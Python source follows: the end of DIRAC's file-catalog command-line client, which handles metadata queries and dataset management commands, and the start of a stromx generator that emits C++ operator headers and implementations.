contMode = False
if value[0] in ['"', "'"] and value[-1] not in ['"', "'"]:
contMode = value[0]
continue
if value.find(',') != -1:
valueList = [ x.replace("'","").replace('"','') for x in value.split(',') ]
mvalue = valueList
if mtype[0:3].lower() == 'int':
mvalue = [ int(x) for x in valueList if not x in ['Missing','Any'] ]
mvalue += [ x for x in valueList if x in ['Missing','Any'] ]
if mtype[0:5].lower() == 'float':
mvalue = [ float(x) for x in valueList if not x in ['Missing','Any'] ]
mvalue += [ x for x in valueList if x in ['Missing','Any'] ]
if operation == "=":
operation = 'in'
if operation == "!=":
operation = 'nin'
mvalue = {operation:mvalue}
else:
mvalue = value.replace("'","").replace('"','')
if not value in ['Missing','Any']:
if mtype[0:3].lower() == 'int':
mvalue = int(value)
if mtype[0:5].lower() == 'float':
mvalue = float(value)
if operation != '=':
mvalue = {operation:mvalue}
if name in metaDict:
if type(metaDict[name]) == DictType:
if type(mvalue) == DictType:
op,value = mvalue.items()[0]
if op in metaDict[name]:
if type(metaDict[name][op]) == ListType:
if type(value) == ListType:
metaDict[name][op] = uniqueElements(metaDict[name][op] + value)
else:
metaDict[name][op] = uniqueElements(metaDict[name][op].append(value))
else:
if type(value) == ListType:
metaDict[name][op] = uniqueElements([metaDict[name][op]] + value)
else:
metaDict[name][op] = uniqueElements([metaDict[name][op],value])
else:
metaDict[name].update(mvalue)
else:
if type(mvalue) == ListType:
metaDict[name].update({'in':mvalue})
else:
metaDict[name].update({'=':mvalue})
elif type(metaDict[name]) == ListType:
if type(mvalue) == DictType:
metaDict[name] = {'in':metaDict[name]}
metaDict[name].update(mvalue)
elif type(mvalue) == ListType:
metaDict[name] = uniqueElements(metaDict[name] + mvalue)
else:
metaDict[name] = uniqueElements(metaDict[name].append(mvalue))
else:
if type(mvalue) == DictType:
metaDict[name] = {'=':metaDict[name]}
metaDict[name].update(mvalue)
elif type(mvalue) == ListType:
metaDict[name] = uniqueElements([metaDict[name]] + mvalue)
else:
metaDict[name] = uniqueElements([metaDict[name],mvalue])
else:
metaDict[name] = mvalue
return metaDict
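# Illustrative queries (hypothetical fields: 'Status' a string field,
# 'Size' an int field defined in the catalog):
#   __createQuery("Status=OK Size>1024") -> {'Status': 'OK', 'Size': {'>': 1024}}
#   __createQuery("Status=OK,Bad")       -> {'Status': {'in': ['OK', 'Bad']}}
# Comma-separated values become 'in'/'nin' queries; quoted values may span
# several arguments thanks to the contMode continuation logic above.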
def do_dataset( self, args ):
""" A set of dataset manipulation commands
Usage:
dataset add <dataset_name> <meta_query> - add a new dataset definition
dataset annotate <dataset_name> <annotation> - add annotation to a dataset
dataset show [-l] [<dataset_name>] - show existing datasets
dataset status <dataset_name> - display the dataset status
dataset files <dataset_name> - show dataset files
dataset rm <dataset_name> - remove dataset
dataset check <dataset_name> - check if the dataset parameters are still valid
dataset update <dataset_name> - update the dataset parameters
dataset freeze <dataset_name> - fix the current contents of the dataset
dataset release <dataset_name> - release the dynamic dataset
"""
argss = args.split()
if (len(argss)==0):
print self.do_dataset.__doc__
return
command = argss[0]
del argss[0]
if command == "add":
self.dataset_add( argss )
elif command == "annotate":
self.dataset_annotate( argss )
elif command == "show":
self.dataset_show( argss )
elif command == "files":
self.dataset_files( argss )
elif command == "rm":
self.dataset_rm( argss )
elif command == "check":
self.dataset_check( argss )
elif command == "update":
self.dataset_update( argss )
elif command == "freeze":
self.dataset_freeze( argss )
elif command == "release":
self.dataset_release( argss )
elif command == "status":
self.dataset_status( argss )
def dataset_add( self, argss ):
""" Add a new dataset
"""
datasetName = argss[0]
metaSelections = ' '.join( argss[1:] )
metaDict = self.__createQuery( metaSelections )
datasetName = self.getPath( datasetName )
result = self.fc.addDataset( datasetName, metaDict )
if not result['OK']:
print "ERROR: failed to add dataset:", result['Message']
else:
print "Successfully added dataset", datasetName
def dataset_annotate( self, argss ):
""" Add a new dataset
"""
datasetName = argss[0]
annotation = ' '.join( argss[1:] )
datasetName = self.getPath( datasetName )
result = self.fc.addDatasetAnnotation( {datasetName: annotation} )
if not result['OK']:
print "ERROR: failed to add annotation:", result['Message']
else:
print "Successfully added annotation to", datasetName
def dataset_status( self, argss ):
""" Display the dataset status
"""
datasetName = argss[0]
result = self.fc.getDatasetParameters( datasetName )
if not result['OK']:
print "ERROR: failed to get status of dataset:", result['Message']
else:
parDict = result['Value']
for par,value in parDict.items():
print par.rjust(20),':',value
def dataset_rm( self, argss ):
""" Remove the given dataset
"""
datasetName = argss[0]
result = self.fc.removeDataset( datasetName )
if not result['OK']:
print "ERROR: failed to remove dataset:", result['Message']
else:
print "Successfully removed dataset", datasetName
def dataset_check( self, argss ):
""" check if the dataset parameters are still valid
"""
datasetName = argss[0]
result = self.fc.checkDataset( datasetName )
if not result['OK']:
print "ERROR: failed to check dataset:", result['Message']
else:
changeDict = result['Value']
if not changeDict:
print "Dataset is not changed"
else:
print "Dataset changed:"
for par in changeDict:
print " ",par,': ',changeDict[par][0],'->',changeDict[par][1]
def dataset_update( self, argss ):
""" Update the given dataset parameters
"""
datasetName = argss[0]
result = self.fc.updateDataset( datasetName )
if not result['OK']:
print "ERROR: failed to update dataset:", result['Message']
else:
print "Successfully updated dataset", datasetName
def dataset_freeze( self, argss ):
""" Freeze the given dataset
"""
datasetName = argss[0]
result = self.fc.freezeDataset( datasetName )
if not result['OK']:
print "ERROR: failed to freeze dataset:", result['Message']
else:
print "Successfully frozen dataset", datasetName
def dataset_release( self, argss ):
""" Release the given dataset
"""
datasetName = argss[0]
result = self.fc.releaseDataset( datasetName )
if not result['OK']:
print "ERROR: failed to release dataset:", result['Message']
else:
print "Successfully released dataset", datasetName
def dataset_files( self, argss ):
""" Get the given dataset files
"""
datasetName = argss[0]
result = self.fc.getDatasetFiles( datasetName )
if not result['OK']:
print "ERROR: failed to get files for dataset:", result['Message']
else:
lfnList = result['Value']
for lfn in lfnList:
print lfn
def dataset_show( self, argss ):
""" Show existing requested datasets
"""
long_ = False
if '-l' in argss:
long_ = True
del argss[argss.index('-l')]
datasetName = ''
if len( argss ) > 0:
datasetName = argss[0]
result = self.fc.getDatasets( datasetName )
if not result['OK']:
print "ERROR: failed to get datasets"
return
datasetDict = result['Value']
if not long_:
for dName in datasetDict.keys():
print dName
else:
fields = ['Key','Value']
datasets = datasetDict.keys()
dsAnnotations = {}
resultAnno = self.fc.getDatasetAnnotation( datasets )
if resultAnno['OK']:
dsAnnotations = resultAnno['Value']['Successful']
for dName in datasets:
records = []
print '\n'+dName+":"
print '='*(len(dName)+1)
for key,value in datasetDict[dName].items():
records.append( [key,str( value )] )
if dName in dsAnnotations:
records.append( [ 'Annotation',dsAnnotations[dName] ] )
printTable( fields, records )
def do_stats( self, args ):
""" Get the catalog statistics
Usage:
stats
"""
try:
result = self.fc.getCatalogCounters()
except AttributeError, x:
print "Error: no statistics available for this type of catalog:", str(x)
return
if not result['OK']:
print ("Error: %s" % result['Message'])
return
fields = ['Counter','Number']
records = []
for key,value in result['Value'].items():
records.append( ( key, str(value) ) )
#print key.rjust(15),':',result['Value'][key]
printTable( fields, records )
def do_rebuild( self, args ):
""" Rebuild auxiliary tables
Usage:
rebuild <option>
"""
argss = args.split()
_option = argss[0]
start = time.time()
result = self.fc.rebuildDirectoryUsage()
if not result['OK']:
print "Error:", result['Message']
return
total = time.time() - start
print "Directory storage info rebuilt in %.2f sec", total
def do_repair( self, args ):
""" Repair catalog inconsistencies
Usage:
repair catalog
"""
argss = args.split()
_option = argss[0]
start = time.time()
result = self.fc.repairCatalog()
if not result['OK']:
print "Error:", result['Message']
return
total = time.time() - start
print "Catalog repaired in %.2f sec", total
def do_exit(self, args):
""" Exit the shell.
usage: exit
"""
sys.exit(0)
def emptyline(self):
pass
if __name__ == "__main__":
if len(sys.argv) > 2:
print FileCatalogClientCLI.__doc__
sys.exit(2)
elif len(sys.argv) == 2:
catype = sys.argv[1]
if catype == "LFC":
from DIRAC.Resources.Catalog.LcgFileCatalogProxyClient import LcgFileCatalogProxyClient
cli = FileCatalogClientCLI(LcgFileCatalogProxyClient())
print "Starting LFC Proxy FileCatalog client"
cli.cmdloop()
elif catype == "DiracFC":
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
cli = FileCatalogClientCLI(FileCatalogClient())
print "Starting ProcDB FileCatalog client"
cli.cmdloop()
else:
print "Unknown catalog type", catype
|
Sbalbp/DIRAC
|
DataManagementSystem/Client/FileCatalogClientCLI.py
|
Python
|
gpl-3.0
| 76,823
|
[
"DIRAC"
] |
c80329ccf449dc6e8f664535bfef3c6f289319610112597ecbf4e73e227b422c
|
# -*- coding: utf-8 -*-
import document
import interface
import package
import rulegenerator
import testgenerator
class ArgumentVisitorBase(interface.ArgumentVisitor):
def visitReturnValue(self, retValue):
self.visitAllocation(retValue)
class SingleArgumentVisitor(ArgumentVisitorBase):
"""
Visitor which handles compound arguments and calls the accept methods
of each component of the compound arguments. I.e. derived visitors do not
have to care about compound arguments they only have to consider "single"
arguments.
"""
def visitCompound(self, compound):
for arg in compound.args:
if arg is not None:
arg.accept(self)
class CollectVisitor(SingleArgumentVisitor):
"""
Visitor which stores all arguments it visits in the common set self.args.
"""
def __init__(self):
self.args = set()
def visitInput(self, inputArg):
self.args.add(inputArg)
def visitParameter(self, parameter):
self.args.add(parameter)
def visitConstant(self, const):
self.args.add(const)
def visitRefInput(self, refInput):
self.args.add(refInput)
def visitAllocation(self, allocation):
self.args.add(allocation)
def visitInputOutput(self, inputOutput):
self.args.add(inputOutput)
def visitOutput(self, output):
self.args.add(output)
class MethodGenerator(object):
"""
Abstract base class of all generators which output files depending on
operators. It provides utility functions used by the derived classes.
"""
class CollectParametersVisitor(SingleArgumentVisitor):
def __init__(self):
self.params = []
def visitParameter(self, parameter):
self.params.append(parameter)
class DocVisitor(SingleArgumentVisitor):
"""
Visitor which holds a document.
"""
def __init__(self, doc):
self.doc = doc
def __init__(self):
self.p = None
self.m = None
self.doc = None
def save(self, package, method, printResult = False):
"""
Writes the output of the generator for the input method to the current
document and optionally prints it to the standard output.
"""
self.p = package
self.m = method
self.doc = document.Document()
self.optionParam = self.createOptionParameter()
self.generate()
if printResult:
print self.doc.string()
def createOptionParameter(self):
"""
Creates and returns an enum parameter which provides one value for
each option of the method.
"""
p = package.EnumParameter("dataFlow", "Data flow")
p.isInit = True
for opt in self.m.options:
desc = package.EnumDescription(opt.ident.constant(), str(opt.name))
desc.name = opt.name
p.descriptions.append(desc)
return p
def visitAll(self, visitor):
"""
Collects all arguments of all options.
"""
for opt in self.m.options:
for arg in opt.args:
arg.accept(visitor)
self.optionParam.accept(visitor)
def visitParameters(self, visitor, visitOptionParam = True):
"""
Collects all arguments of all options and removes duplicates (i.e.
arguments with common identifier). Then the visitor visits all
remaining arguments and the option parameter if the corresponding flag is
set to True.
"""
v = CollectVisitor()
for opt in self.m.options:
for arg in opt.args:
arg.accept(v)
args = v.args
argIdents = set()
filteredArgs = set()
for arg in args:
if str(arg.ident) not in argIdents:
argIdents.add(str(arg.ident))
filteredArgs.add(arg)
for arg in sorted(filteredArgs, key=lambda arg: str(arg.ident)):
arg.accept(visitor)
if visitOptionParam and self.optionParam:
self.optionParam.accept(visitor)
def visitOption(self, opt, visitor):
"""
The visitor visits all arguments of the given option.
"""
for arg in opt.args:
arg.accept(visitor)
def namespaceEnter(self):
"""
Enters the namespace of the package the method belongs to.
"""
self.doc.namespaceEnter("stromx")
self.doc.namespaceEnter(self.p.ident)
def namespaceExit(self):
"""
Exits the package namespace.
"""
self.doc.namespaceExit(self.p.ident)
self.doc.namespaceExit("stromx")
self.doc.blank()
class OpHeaderGenerator(MethodGenerator):
"""
Generates the header of a method operator.
"""
class ConnectorEnumVisitor(SingleArgumentVisitor):
"""
Exports the enumeration of the IDs of all visited input and output
connectors.
"""
def __init__(self):
self.inputs = []
self.outputs = []
self.params = []
def visitRefInput(self, refInputArg):
self.inputs.append(refInputArg)
def visitInput(self, inputArg):
self.inputs.append(inputArg)
def visitInputOutput(self, arg):
self.inputs.append(arg)
self.outputs.append(arg)
def visitOutput(self, output):
self.inputs.append(output)
self.outputs.append(output)
def visitAllocation(self, allocation):
self.outputs.append(allocation)
def visitParameter(self, parameter):
self.params.append(parameter)
def export(self, doc):
inputIds = ["INPUT_{0}".format(i.ident.constant()) for i in
self.inputs]
outputIds = ["OUTPUT_{0}".format(i.ident.constant()) for i in
self.outputs]
paramIds = ["PARAMETER_{0}".format(i.ident.constant()) for i in
self.params]
inputIds = sorted(set(inputIds))
outputIds = sorted(set(outputIds))
paramIds = sorted(set(paramIds))
dataIds = inputIds + outputIds + paramIds
doc.enum("DataId", dataIds)
class DataMemberVisitor(MethodGenerator.DocVisitor):
"""
Exports class members for the values of all visited parameters.
"""
def visitParameter(self, parameter):
l = "{0} {1};".format(parameter.dataType.concreteTypeId(),
parameter.ident.attribute())
self.doc.line(l)
class DescriptionsVisitor(MethodGenerator.DocVisitor):
"""
Exports class members for the parameter description of all visited
parameters.
"""
def visitParameter(self, parameter):
if parameter.argType == package.ArgType.PLAIN:
self.doc.line(("runtime::Parameter* m_{0}Parameter;"
).format(parameter.ident))
elif parameter.argType == package.ArgType.ENUM:
self.doc.line(("runtime::EnumParameter* m_{0}Parameter;"
).format(parameter.ident))
elif parameter.argType == package.ArgType.NUMERIC:
self.doc.line(("runtime::NumericParameter<{1}>* m_{0}Parameter;"
).format(parameter.ident,
parameter.dataType.typeId()))
elif parameter.argType == package.ArgType.MATRIX:
self.doc.line(("runtime::MatrixParameter* m_{0}Parameter;"
).format(parameter.ident))
else:
assert(False)
def visitOutput(self, arg):
self.visitInput(arg)
def visitInputOutput(self, arg):
self.visitInput(arg)
def visitAllocation(self, arg):
self.visitInput(arg)
def visitRefInput(self, arg):
self.visitInput(arg)
def visitInput(self, arg):
self.doc.line((
"runtime::Input* m_{0}Description;"
).format(arg.ident))
class EnumParameterIdVisitor(MethodGenerator.DocVisitor):
"""
Exports enumerations for the IDs of all visited enumeration parameters.
"""
def visitParameter(self, parameter):
if parameter.argType != package.ArgType.ENUM:
return
keys = []
for desc in parameter.descriptions:
keys.append(desc.ident)
enumName = "{0}Id".format(parameter.ident.className())
self.doc.enum(enumName, keys)
class EnumConversionDeclVisitor(MethodGenerator.DocVisitor):
"""
Exports declarations of conversion functions for each visited
enumeration parameter.
"""
def visitParameter(self, parameter):
if parameter.argType != package.ArgType.ENUM:
return
name = parameter.ident.className()
l = "int convert{0}(const runtime::Enum & value);".format(name)
self.doc.line(l)
def generate(self):
self.__includeGuardEnter()
self.__includes()
self.namespaceEnter()
self.__classEnter()
self.__public()
v = OpHeaderGenerator.EnumParameterIdVisitor(self.doc)
self.visitParameters(v)
v = OpHeaderGenerator.ConnectorEnumVisitor()
self.visitAll(v)
v.export(self.doc)
self.__constructor()
self.__kernelOverloads()
self.__private()
self.__statics()
self.__setupFunctions()
v = OpHeaderGenerator.EnumConversionDeclVisitor(self.doc)
self.visitParameters(v, False)
self.doc.blank()
v = OpHeaderGenerator.DataMemberVisitor(self.doc)
self.visitParameters(v)
v = OpHeaderGenerator.DescriptionsVisitor(self.doc)
self.visitParameters(v)
self.__classExit()
self.namespaceExit()
self.__includeGuardExit()
filename = "stromx/{0}/{1}.h".format(self.p.ident,
self.m.ident.className())
with open(filename, "w") as f:
f.write(self.doc.string())
def __includes(self):
self.doc.line('#include "stromx/{0}/Config.h"'.format(self.p.ident))
self.doc.line('#include <stromx/cvsupport/Matrix.h>')
self.doc.line('#include <stromx/runtime/Enum.h>')
self.doc.line('#include <stromx/runtime/EnumParameter.h>')
self.doc.line('#include <stromx/runtime/List.h>')
self.doc.line('#include <stromx/runtime/MatrixParameter.h>')
self.doc.line('#include <stromx/runtime/NumericParameter.h>')
self.doc.line('#include <stromx/runtime/OperatorException.h>')
self.doc.line('#include <stromx/runtime/OperatorKernel.h>')
self.doc.line('#include <stromx/runtime/Primitive.h>')
self.doc.line('#include <stromx/runtime/Variant.h>')
self.doc.line('#include <stromx/runtime/Visualization.h>')
self.doc.blank()
def __includeGuardEnter(self):
self.doc.line("#ifndef {0}".format(self.__includeGuard()))
self.doc.line("#define {0}".format(self.__includeGuard()))
self.doc.blank()
def __classEnter(self):
self.doc.line("class {0} {1} : public runtime::OperatorKernel".format(
self.__apiDecl(), self.m.ident.className()))
self.doc.line("{")
self.doc.increaseIndent()
def __public(self):
self.doc.label("public")
def __constructor(self):
self.doc.line("{0}();".format(self.m.ident.className()))
def __kernelOverloads(self):
self.doc.line("virtual OperatorKernel* clone() const "
"{{ return new {0}; }}".format(self.m.ident.className()))
self.doc.line("virtual void setParameter(const unsigned int id, "
"const runtime::Data& value);")
self.doc.line("virtual const runtime::DataRef getParameter("
"const unsigned int id) const;")
self.doc.line("void initialize();")
self.doc.line("virtual void execute(runtime::DataProvider& provider);")
self.doc.blank()
def __private(self):
self.doc.label("private")
def __statics(self):
self.doc.line("static const std::string PACKAGE;")
self.doc.line("static const runtime::Version VERSION;")
self.doc.line("static const std::string TYPE;")
self.doc.blank()
def __setupFunctions(self):
self.doc.line("const std::vector<const runtime::Parameter*> "
"setupInitParameters();")
self.doc.line("const std::vector<const runtime::Parameter*> "
"setupParameters();")
self.doc.line("const std::vector<const runtime::Input*> "
"setupInputs();")
self.doc.line("const std::vector<const runtime::Output*> "
"setupOutputs();")
self.doc.blank()
def __classExit(self):
self.doc.decreaseIndent()
self.doc.line("};")
def __includeGuardExit(self):
self.doc.line("#endif // {0}".format(self.__includeGuard()))
def __includeGuard(self):
return "STROMX_{0}_{1}_H".format(self.p.ident.upper(),
self.m.ident.upper())
def __apiDecl(self):
return "STROMX_{0}_API".format(self.p.ident.upper())
class OpImplGenerator(MethodGenerator):
"""
Generates the implementation of a method operator.
"""
class ParameterInitVisitor(MethodGenerator.CollectParametersVisitor):
"""
Exports the constructor initialization for all visited parameter data
members.
"""
def export(self, doc):
for i, p in enumerate(self.params):
defaultValue = p.default if p.default != None else ""
defaultValue = document.pythonToCpp(defaultValue)
init = "{0}({1})".format(p.ident.attribute(), defaultValue)
if i != len(self.params) - 1:
doc.line("{0},".format(init))
else:
doc.line(init)
class GetParametersVisitor(MethodGenerator.DocVisitor):
"""
Exports case sections which return the values of all visited
parameters.
"""
def visitParameter(self, parameter):
self.doc.label("case PARAMETER_{0}".format(parameter.ident.constant()))
self.doc.line("return {0};".format(parameter.ident.attribute()))
class SetParametersVisitor(MethodGenerator.DocVisitor):
"""
Exports case sections which set the values of all visited parameters.
"""
def visitParameter(self, parameter):
l = ""
if parameter.argType == package.ArgType.PLAIN:
pass
elif parameter.argType == package.ArgType.ENUM:
l = ("cvsupport::checkEnumValue(castedValue, {0}Parameter, *this);"
).format(parameter.ident.attribute())
elif parameter.argType == package.ArgType.NUMERIC:
l = ("cvsupport::checkNumericValue(castedValue, {0}Parameter, *this);"
).format(parameter.ident.attribute())
elif parameter.argType == package.ArgType.MATRIX:
l = ("cvsupport::checkMatrixValue(castedValue, {0}Parameter, *this);"
).format(parameter.ident.attribute())
else:
assert(False)
self.__setParameterWithCheck(parameter, l)
def __setParameterWithCheck(self, parameter, check):
self.doc.label("case PARAMETER_{0}".format(parameter.ident.constant()))
self.doc.scopeEnter()
self.doc.line(("const {0} & castedValue = runtime::data_cast<{1}>(value);"
).format(parameter.dataType.typeId(),
parameter.dataType.typeId()))
l = ("if(! castedValue.variant().isVariant({0}))".format(
parameter.dataType.variant()))
self.doc.line(l)
self.doc.scopeEnter()
l = 'throw runtime::WrongParameterType(parameter(id), *this);'
self.doc.line(l)
self.doc.scopeExit()
if check != "":
self.doc.line(check)
checkParams = rulegenerator.CheckParameterVisitor(self.doc,
parameter)
for rule in parameter.rules:
rule.accept(checkParams)
self.doc.line(("{0} = castedValue;"
).format(parameter.ident.attribute()))
self.doc.scopeExit()
self.doc.line("break;")
class SetupParametersVisitor(MethodGenerator.DocVisitor):
"""
Exports the allocation of the descriptions of all visited parameters.
"""
def __init__(self, doc, isInit = False):
super(OpImplGenerator.SetupParametersVisitor, self).__init__(doc)
self.isInit = isInit
def visitParameter(self, parameter):
if parameter.argType == package.ArgType.PLAIN:
self.__visitPlainParameter(parameter)
elif parameter.argType == package.ArgType.ENUM:
self.__visitEnumParameter(parameter)
elif parameter.argType == package.ArgType.MATRIX:
self.__visitMatrixParameter(parameter)
elif parameter.argType == package.ArgType.NUMERIC:
self.__visitNumericParameter(parameter)
else:
assert(False)
def __visitPlainParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = "{0} = new runtime::Parameter(PARAMETER_{1}, {2});"\
.format(ident, parameter.ident.constant(),
parameter.dataType.variant())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'.format(ident, parameter.name)
self.doc.line(l)
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __visitEnumParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = ("{0} = new runtime::EnumParameter(PARAMETER_{1});"
).format(ident, parameter.ident.constant())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'.format(ident, parameter.name)
self.doc.line(l)
for desc in parameter.descriptions:
d = 'runtime::Enum({0})'.format(desc.ident)
l = '{0}->add(runtime::EnumDescription({1}, L_("{2}")));'\
.format(ident, d, desc.name)
self.doc.line(l)
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __visitMatrixParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = "{0} = new runtime::MatrixParameter(PARAMETER_{1}, {2});"\
.format(ident, parameter.ident.constant(),
parameter.dataType.variant())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'.format(ident, parameter.name)
self.doc.line(l)
self.doc.line("{0}->setRows({1});".format(ident, parameter.rows))
self.doc.line("{0}->setCols({1});".format(ident, parameter.cols))
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __visitNumericParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = ("{0} = new runtime::NumericParameter<{2}>(PARAMETER_{1});"
).format(ident, parameter.ident.constant(),
parameter.dataType.typeId())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'\
.format(ident, parameter.name)
self.doc.line(l)
if parameter.maxValue != None:
l = "{0}->setMax({1});".format(ident,
parameter.dataType.cast(parameter.maxValue))
self.doc.line(l)
if parameter.minValue != None:
l = "{0}->setMin({1});".format(ident,
parameter.dataType.cast(parameter.minValue))
self.doc.line(l)
if parameter.step != None:
l = "{0}->setStep({1});".format(ident,
parameter.dataType.cast(parameter.step))
self.doc.line(l)
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __accessMode(self, ident):
if self.isInit:
accessMode = "NONE_WRITE"
else:
accessMode = "ACTIVATED_WRITE"
l = "{0}->setAccessMode(runtime::Parameter::{1});"\
.format(ident, accessMode)
self.doc.line(l)
class SetupOutputsVisitor(MethodGenerator.DocVisitor):
"""
Exports the allocation of the descriptions of all visited outputs.
"""
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
if output.argType == package.ArgType.PLAIN:
self.__setupDescription(output)
elif output.argType == package.ArgType.MATRIX:
self.__setupMatrixDescription(output)
else:
assert(False)
def visitAllocation(self, allocation):
self.visitOutput(allocation)
def __setupDescription(self, arg):
l = "runtime::Output* {0} = new runtime::Output(OUTPUT_{1}, {2});"\
.format(arg.ident, arg.ident.constant(),
arg.dataType.variant())
self.doc.line(l)
l = '{0}->setTitle(L_("{1}"));'.format(arg.ident, arg.name)
self.doc.line(l)
if arg.isAsynchronous:
l = '{0}->setOperatorThread(1);'.format(arg.ident)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(arg.ident, variant)
self.doc.line(l)
l = "outputs.push_back({0});".format(arg.ident)
self.doc.line(l)
self.doc.blank()
def __setupMatrixDescription(self, arg):
l = ("runtime::Output* {0} = new "
"runtime::Output(OUTPUT_{1}, {2});")\
.format(arg.ident, arg.ident.constant(),
arg.dataType.variant())
self.doc.line(l)
l = '{0}->setTitle(L_("{1}"));'.format(arg.ident, arg.name)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(arg.ident, variant)
self.doc.line(l)
l = '{0}->setRows({1});'.format(arg.ident, arg.rows)
self.doc.line(l)
l = '{0}->setCols({1});'.format(arg.ident, arg.cols)
self.doc.line(l)
if arg.isAsynchronous:
l = '{0}->setOperatorThread(1);'.format(arg.ident)
self.doc.line(l)
l = "outputs.push_back({0});".format(arg.ident)
self.doc.line(l)
self.doc.blank()
class SetupInputsVisitor(MethodGenerator.DocVisitor):
"""
Exports the allocation of the descriptions of all visited inputs.
"""
def visitOutput(self, arg):
if arg.argType == package.ArgType.PLAIN:
self.__setupDescription(arg, True)
elif arg.argType == package.ArgType.MATRIX:
self.__setupMatrixDescription(arg, True)
else:
assert(False)
def visitInput(self, arg):
if arg.argType == package.ArgType.PLAIN:
self.__setupDescription(arg, False)
elif arg.argType == package.ArgType.MATRIX:
self.__setupMatrixDescription(arg, False)
else:
assert(False)
def visitInputOutput(self, arg):
self.visitInput(arg)
def __setupDescription(self, arg, isOutput):
description = "{0}Description".format(arg.ident.attribute())
l = "{0} = new runtime::Input(INPUT_{1}, {2});"\
.format(description, arg.ident.constant(),
self.__getVariant(arg, isOutput))
self.doc.line(l)
l = '{0}->setTitle(L_("{1}"));'\
.format(description, arg.name)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(description, variant)
self.doc.line(l)
l = "inputs.push_back({0});".format(description)
self.doc.line(l)
self.doc.blank()
def __setupMatrixDescription(self, arg, isOutput):
description = "{0}Description".format(arg.ident.attribute())
l = (
"{0} = new "
"runtime::Input(INPUT_{1}, {2});"
).format(description, arg.ident.constant(),
self.__getVariant(arg, isOutput))
self.doc.line(l)
l = '{0}->setTitle("{1}");'.format(description, arg.name)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(description, variant)
self.doc.line(l)
l = '{0}->setRows({1});'.format(description, arg.rows)
self.doc.line(l)
l = '{0}->setCols({1});'.format(description, arg.cols)
self.doc.line(l)
l = "inputs.push_back({0});".format(description)
self.doc.line(l)
self.doc.blank()
def __getVariant(self, arg, isOutput):
if isOutput:
return arg.dataType.canBeCreatedFromVariant()
else:
return arg.dataType.variant()
class InputMapperVisitor(MethodGenerator.DocVisitor):
"""
Exports input mappers for all visited inputs and outputs.
"""
def visitInput(self, arg):
self.__visit(arg)
def visitOutput(self, arg):
self.__visit(arg)
def visitInputOutput(self, arg):
self.__visit(arg)
def __visit(self, arg):
ident = arg.ident
constant = arg.ident.constant()
l = "runtime::Id2DataPair {0}InMapper(INPUT_{1});".format(ident, constant)
self.doc.line(l)
class ReceiveInputDataVisitor(SingleArgumentVisitor):
"""
Exports the receive input command for all visited inputs and outputs.
"""
def __init__(self):
self.line = ""
def visitInput(self, inputArg):
self.__visit(inputArg)
def visitOutput(self, output):
self.__visit(output)
def visitInputOutput(self, arg):
self.__visit(arg)
def export(self, doc):
if self.line != "":
doc.line("provider.receiveInputData({0});".format(self.line))
def __visit(self, arg):
if self.line == "":
self.line = "{0}InMapper".format(arg.ident)
else:
self.line += " && {0}InMapper".format(arg.ident)
class InDataVisitor(MethodGenerator.DocVisitor):
"""
Exports runtime::Data* variables for all visited inputs and outputs.
"""
def visitInput(self, inputArg):
self.doc.line(("const runtime::Data* "
"{0}Data = 0;").format(inputArg.ident))
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
self.doc.line("runtime::Data* {0}Data = 0;".format(output.ident))
class AccessVisitor(MethodGenerator.DocVisitor):
"""
Exports data accessors for all visited inputs and outputs.
"""
def visitInput(self, inputArg):
self.doc.line(("runtime::ReadAccess "
"{0}ReadAccess;").format(inputArg.ident))
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
mapper = "{0}InMapper".format(output.ident)
data = "{0}Data".format(output.ident)
self.doc.line(("runtime::DataContainer inContainer = "
"{0}.data();").format(mapper))
self.doc.line("runtime::WriteAccess writeAccess(inContainer);")
self.doc.line("{0} = &writeAccess.get();".format(data))
class CopyWriteAccessVisitor(SingleArgumentVisitor):
"""
Exports the if-conditions which either create a read access or
reference an existing write access to read each visited input.
"""
def __init__(self):
self.output = None
self.inputs = []
def visitInput(self, inputArg):
self.inputs.append(inputArg)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
assert(self.output == None)
self.output = output
def export(self, doc):
# no danger of reading a write access if there is no output (i.e.
# no write access)
if self.output == None:
for i in self.inputs:
l = ("{0}ReadAccess = runtime::ReadAccess("
"{0}InMapper.data());").format(i.ident)
doc.line(l)
l = "{0}Data = &{0}ReadAccess.get();".format(i.ident)
doc.line(l)
doc.blank()
return
# check if a read access refers to the same data as the write
# access and handle this situation accordingly
for i in self.inputs:
l = "if({0}InMapper.data() == inContainer)".format(i.ident)
doc.line(l)
doc.scopeEnter()
if i.inPlace:
doc.line("srcData = &writeAccess.get();")
else:
message = '"Can not operate in place."'
ex = (
"throw runtime::InputError(INPUT_{0}, *this, {1});"
).format(i.ident.constant(), message)
doc.line(ex)
doc.scopeExit()
doc.line("else")
doc.scopeEnter()
l = ("{0}ReadAccess = runtime::ReadAccess("
"{0}InMapper.data());").format(i.ident)
doc.line(l)
l = "{0}Data = &{0}ReadAccess.get();".format(i.ident)
doc.line(l)
doc.scopeExit()
doc.blank()
class CheckVariantVisitor(MethodGenerator.DocVisitor):
"""
Exports the variant check for each visited input.
